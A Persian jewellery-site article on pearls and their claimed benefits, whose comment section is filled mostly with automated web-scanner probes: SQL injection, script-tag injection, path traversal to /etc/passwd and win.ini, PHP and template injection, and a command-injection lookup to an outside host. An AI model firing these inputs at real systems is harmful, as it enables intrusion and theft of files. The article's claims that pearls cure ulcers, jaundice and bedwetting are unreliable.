سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

ﺧﻮاص و ﻓﻮاﯾﺪ ﻣﺮوارﯾﺪ

از زﻣﺎن ﻫﺎي ﮔﺬﺷﺘﻪ ﺗﺎ اﻣﺮوز، اﺳﺘﻔﺎده از زﯾﻮرآﻻت ﺑﻪ ﻫﻤﺮاه ﮔﻮﻫﺮﻫﺎي ﻗﯿﻤﺘﯽ و ﻧﯿﻤﻪ ﻗﯿﻤﺘﯽ ﻣﻮرد ﺗﻮﺟﻪ ﺑﻮده اﺳﺖ. ﻋﻼوه ﺑﺮ ﮔﻮﻫﺮ ﻫﺎﯾﯽ ﻧﻈﯿﺮ اﻟﻤﺎس، زﻣﺮد و ﯾﺎﻗﻮت ﮐﻪ ﮐﺎﻧﯽ ﻫﺎﯾﯽ ﻫﺴﺘﻨﺪ ﮐﻪ از ﻣﻌﺎدن اﺳﺘﺨﺮاج ﻣﯽ ﺷﻮﻧﺪ، ﻣﯽ ﺗﻮان ﺑﻪ ﮔﻮﻫﺮ دیگری اﺷﺎره ﻧﻤﻮد ﮐﻪ در اﻋﻤﺎق اﻗﯿﺎﻧﻮس ﻫﺎ رﺷﺪ ﮐﺮده و ﺑﺪون ﻧﯿﺎز ﺑﻪ ﺗﺮاش و ﺻﯿﻘﻞ از زﯾﺒﺎﯾﯽ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮدي ﺑﺮﺧﻮردار اﺳﺖ.

ﺧﻮاص و ﻓﻮاﯾﺪ ﻣﺮوارﯾﺪ

ﻣﺮوارﯾﺪ از ﻋﺠﺎﯾﺐ ﻃﺒﯿﻌﺖ ﺑﻮده و در ﻓﺮﻫﻨﮓ ﻫﺎي ﻣﺘﻔﺎوت از ارزش ﻣﺎﻟﯽ و ﻣﻌﻨﻮي ﺑﺴﯿﺎري ﺑﻬﺮه ﻣﻨﺪ اﺳﺖ. ﻣﺮوارﯾﺪ ﺗﻮﺳﻂ ﺟﺎﻧﻮر ﻧﺮم ﺗﻨﯽ ﺗﻮﻟﯿﺪ ﻣﯽ ﺷﻮد ﮐﻪ ﻣﺎ آن را ﺻﺪف ﻣﯽ ﻧﺎﻣﯿﻢ. در ﺣﻘﯿﻘﺖ ﻫﻨﮕﺎﻣﯽ ﮐﻪ ﺟﺴﻢ ﺧﺎرﺟﯽ وارد ﺻﺪف ﻣﯽ ﺷﻮد، ﺻﺪف ﺑﻪ ﻣﻨﻈﻮر دﻓﻊ آن، ﻣﻮادي ﺗﺮﺷﺢ ﮐﺮده ﮐﻪ از ﺟﻤﻊ ﺷﺪن اﯾﻦ ﻣﻮاد ﻣﺮوارﯾﺪ شکل می گیرد.

مروارید ﺳﺒﺐ ﻟﻄﺎﻓﺖ ﻗﻠﺐ و روح شده و ﻋﺸﻖ ﺧﺎﻟﺼﺎﻧﻪ را ارﻣﻐﺎن ﻣﯽ آورد. ﺣﺲ از ﺧﻮد ﮔﺬﺷﺘﮕﯽ و ﻋﻔﺖ و ﭘﺎﮐﺪاﻣﻨﯽ را ﺗﻘﻮﯾﺖ و ﻏﻢ و اﻧﺪوه و ﺿﻌﻒ روﺣﯿﻪ را از ﺑﯿﻦ ﻣﯽ ﺑﺮد. این گوهر ﺑﺮاي دﻓﻊ ﻧﯿﺮوﻫﺎي ﻣﻨﻔﯽ و ﺟﺬب اﻧﺮژي ﻣﺜﺒﺖ ﻣﻔﯿﺪ ﻣﯽ ﺑﺎﺷﺪ. ﻫﻤﭽﻨﯿﻦ ﺑﺮاي ﺗﻘﻮﯾﺖ ﻣﻌﺪه و روده ﻫﺎ ﺗﺎﺛﯿﺮ ﺑﺴﺰاﯾﯽ دارد. مروارید ﺑﺎﻋﺚ ﺧﻮش ﺷﺎﻧﺴﯽ شده و ﺟﻬﺖ ﺗﻨﻈﯿﻢ ﻋﺎدات ﻧﺎدرﺳﺖ ﮐﻤﮏ زﯾﺎدي ﺑﻪ ﺷﻤﺎ ﻣﯽ ﮐﻨﺪ. این گوهر ﺑﺮاي درﻣﺎن زﺧﻢ ﻣﻌﺪه ﻣﻔﯿﺪ و ﻫﻤﭽﻨﯿﻦ ﺳﺒﺐ اﻓﺰاﯾﺶ روﺷﻨﺎﯾﯽ و ﻧﻮر ﭼﺸﻢ ﻣﯽ ﺷﻮد. از مروارید می توان برای درﻣﺎن ﺷﺐ ادراري، ﺑﯿﻤﺎري ﻫﺎي ﻣﺜﺎﻧﻪ و اﺧﺘﻼﻻت دﺳﺘﮕﺎه ﮔﻮارش، و ﻧﯿﺰ ﺳﺮﻣﺎﺧﻮردﮔﯽ، ﻋﻄﺴﻪ ﻫﺎي داﺋﻤﯽ سود برد. ﺑﺮاي ﻣﺸﮑﻼﺗﯽ از ﻗﺒﯿﻞ ﺑﻮي ﺑﺪ دﻫﺎن ، اﺳﻬﺎل ، ﻧﻔﺦ و ﺗﻬﻮع، ﯾﺮﻗﺎن و ﺑﯿﻤﺎري ﻫﺎي ﭘﻮﺳﺘﯽ نیز ﻣﻔﯿﺪ است.

ﺑﺮﺧﻮرد ﺳﻄﺢ ﻣﺮوارﯾﺪ ﺑﺎ اﺟﺴﺎم و ﺗﻤﺎس آن ﺑﺎ ﮐﺜﯿﻔﯽ، اﺳﯿﺪﻫﺎ، ﻣﻮاد آراﯾﺸﯽ، اﺳﭙﺮي و ﻋﻄﺮﻫﺎ در دوام و ﺟﻼي ﻣﺮوارﯾﺪ اﺛﺮ ﻣﻨﻔﯽ ﻣﯽ ﮔﺬارد.

اﻣﺮوزه ﻣﺮوارﯾﺪ ﻫﺎي ﻃﺒﯿﻌﯽ ﺑﻪ دﻟﯿﻞ ﺷﮑﺎر ﺑﯽ روﯾﻪ ﺻﺪف ﺑﺴﯿﺎر ﮐﻤﯿﺎب ﺑﻮده و در ﻧﺘﯿﺠﻪ ﺑﺴﯿﺎر ارزﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ. از اﯾﻦ رو اﻧﺴﺎن ﺑﻪ ﻣﻨﻈﻮر ﺣﻔﻆ ارزش و ﻗﺪﻣﺖ اﯾﻦ ﮔﻮﻫﺮ زﯾﺒﺎ اﻗﺪام ﺑﻪ ﭘﺮورش ﻣﺮوارﯾﺪ ﮐﺮده اﺳﺖ. اﻣﺮوزه ﺑﺴﯿﺎري از ﻣﺮوارﯾﺪ ﻫﺎي ﻣﻮﺟﻮد در ﺑﺎزار ﻫﺎي ﺟﻬﺎﻧﯽ، ﻣﺮوارﯾﺪ ﻫﺎي ﭘﺮورﺷﯽ ﺑﻮده ﮐﻪ در واﻗﻊ اﻧﺴﺎن ﺑﻪ ﻧﻮﻋﯽ در رﺷﺪ آن دﺧﺎﻟﺖ داﺷﺘﻪ اﺳﺖ و در ﻧﺘﯿﺠﻪ از ﻗﯿﻤﺖ پایین تری ﻧﺴﺒﺖ ﺑﻪ ﻧﻤﻮﻧﻪ ﻃﺒﯿﻌﯽ ﺧﻮد ﺑﺮﺧﻮردار اﺳﺖ.

اﻣﺮوزه ﺣﺪود 8 ﻫﺰار ﮔﻮﻧﻪ ﻣﺘﻔﺎوت ﺻﺪف ﺷﻨﺎﺳﺎﯾﯽ ﺷﺪه ﮐﻪ ﻓﻘﻂ 20 ﮔﻮﻧﻪ از آﻧﻬﺎ ﻣﯽ ﺗﻮاﻧﻨﺪ ﻣﺮوارﯾﺪ ﭘﺮورش دﻫﻨﺪ.

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1" OR 3*2>(0+5+480-480) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1" OR 3+480-480-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1" OR 2+480-480-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 3*2>(0+5+244-244)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 3+244-244-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 2+244-244-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 3*2>(0+5+953-953) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 3+953-953-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
-1 OR 2+953-953-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:22
CcVBLzcg

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:21
1????%2527%2522

0 0

ZOHA 51 سال میگه :

تاریخ: 1399/06/13 ساعت 20:36
مرواریدواسه بعضی آرمانهای
تولدمثل مهروفروردین اصلا مفیدنیست که مضرهم هست(من کتاب خواص گوهرهرودارم همه اینروتوش نوشته )...خودمم اصلا ازاین جواهراستفاده نکردم ونمیکنم!

0 0

zozdbskjho 51 سال میگه :

تاریخ: 1399/05/09 ساعت 02:39
Muchas gracias. ?Como puedo iniciar sesion?

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1RDXNM[!+!]

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1tTCRm
d2MN(9826)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1}body{acu:Expre/**/SSion(d2MN(9080))}

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
[url=][/url]

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
?

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1<ScRiPt>d2MN(9628)</sCripT>

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1u003CScRiPtd2MN(9503)u003C/sCripTu003E

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
%31%3C%53%63%52%69%50%74%20%3E%64%32%4D%4E%289962%29%3C%2F%73%43%72%69%70%54%3E

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9694)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9302)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9939)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9136)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1ZXPBZ[!+!]

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
1d2MN(9176)

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
{{9999156*10000341}}

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:58
CWS000x?=?1N?
]s??0Q?L

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
acux1136??z1??z2a?bcxuca1136

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
acu1808<s1﹥s2ʺs3ʹuca1808

0 0

ypaibuqj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
19038512

0 0

luvbkjpa 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
index.php/.

0 0

mrvxehod 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/www.vulnweb.com

0 0

rsqdjmnf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
1????%2527%2522

0 0

givvojjc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57

0 0

luvbkjpa 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
index.php

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

paudmwcv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
${

0 0

paudmwcv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
";print(md5(acunetix_wvs_security_test));$a="

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
................windowswin.ini

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
????????????????????????????????????????????????windows??win.ini

0 0

nhpvakyq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
testasp.vulnweb.com

0 0

paudmwcv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
;print(md5(acunetix_wvs_security_test));

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../../../../../../../../../../windows/win.ini.jpg

0 0

nhpvakyq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
C:WINDOWSsystem32driversetchosts

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../../../../../../../../../../windows/win.ini

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
WEB-INFweb.xml

0 0

nhpvakyq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/WEB-INF/web.xml

0 0

nhpvakyq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
1some_inexistent_file_with_long_name.jpg

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
WEB-INF/web.xml

0 0

nhpvakyq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
/../../../../../../../etc/passwd

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
..??..??..??..??..??..??..??..??etc/passwd

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:57
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
%2fetc%2fpasswd

0 0

xlxpquxj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
${9999503+10000243}

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/etc/passwd

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

pxktwwyi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
to
bcc:013405.51-3013.51.9c67f.1

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

pxktwwyi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1
bcc:013405.51-3011.51.9c67f.1

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../etc/passwd.jpg

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../../../../../../proc/version

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

snuojkma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
../../../../../../../../../../etc/passwd

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
0

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1" OR 2+698-698-1=0+0+0+1 --

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1 OR 2+798-798-1=0+0+0+1

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
-1 OR 2+708-708-1=0+0+0+1 --

0 0

bcnuvbmc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
$(nslookup dns.ce.13405.51-2993.51.9c67f.1.bxss.me)

0 0

jwtkquan 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
aHwlrcRx

0 0

hkoyqjma 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
D6wwBN3N

0 0

bcnuvbmc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
set|set&set

0 0

dffqckkt 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1GBWIO[!+!]

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
11waLo
ut87(9533)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1}body{acu:Expre/**/SSion(ut87(9313))}

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
[url=][/url]

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
?

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1<ScRiPt>ut87(9012)</sCripT>

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1u003CScRiPtut87(9118)u003C/sCripTu003E

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
%31%3C%53%63%52%69%50%74%20%3E%75%74%38%37%289417%29%3C%2F%73%43%72%69%70%54%3E

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9263)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9464)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9900)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9465)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1CTYSG[!+!]

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1ut87(9646)

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
{{9999558*10000412}}

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
CWS000x?=?1N?
]s??0Q?L

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
acux5682??z1??z2a?bcxuca5682

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
acu1386<s1﹥s2ʺs3ʹuca1386

0 0

cuirvnoh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
19298837

0 0

jysyddds 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/www.vulnweb.com

0 0

eercpdmu 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1????%2527%2522

0 0

djdehxra 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
index.php/.

0 0

djdehxra 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
index.php

0 0

tjluhoxf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
${

0 0

tjluhoxf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
";print(md5(acunetix_wvs_security_test));$a="

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

tjluhoxf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
;print(md5(acunetix_wvs_security_test));

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
................windowswin.ini

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
????????????????????????????????????????????????windows??win.ini

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../windows/win.ini.jpg

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
C:WINDOWSsystem32driversetchosts

0 0

adkheglm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
testasp.vulnweb.com

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../windows/win.ini

0 0

adkheglm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
WEB-INFweb.xml

0 0

adkheglm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/WEB-INF/web.xml

0 0

adkheglm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1some_inexistent_file_with_long_name.jpg

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
WEB-INF/web.xml

0 0

adkheglm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/../../../../../../../etc/passwd

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
..??..??..??..??..??..??..??..??etc/passwd

0 0

gidexpbd 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
${9999948+10000141}

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
%2fetc%2fpasswd

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/etc/passwd

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../etc/passwd.jpg

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

